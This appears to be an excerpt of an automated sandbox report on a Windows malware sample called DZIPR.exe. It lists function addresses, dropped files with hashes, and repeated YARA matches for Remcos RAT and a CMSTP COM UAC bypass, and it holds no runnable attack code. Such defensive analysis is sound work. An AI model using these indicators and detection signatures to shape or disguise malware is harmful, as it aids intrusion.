Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB1D85	19_2_6FEB1D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5CA0	19_2_6FEA5CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC2CBB	19_2_6FEC2CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB6C6C	19_2_6FEB6C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC586C	19_2_6FEC586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB6860	19_2_6FEB6860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA17D0	19_2_6FEA17D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC3743	19_2_6FEC3743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA1730	19_2_6FEA1730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA1731	19_2_6FEA1731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB648C	19_2_6FEB648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC31FF	19_2_6FEC31FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB708C	19_2_6FEB708C

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\lejp 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\paogviura 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C9250C9 appears 65 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FEB53BC appears 49 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C9253BC appears 45 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FEB50C9 appears 65 times
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: String function: 0040243B appears 37 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FE350C9 appears 66 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FE353BC appears 48 times

Yara signature match

Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
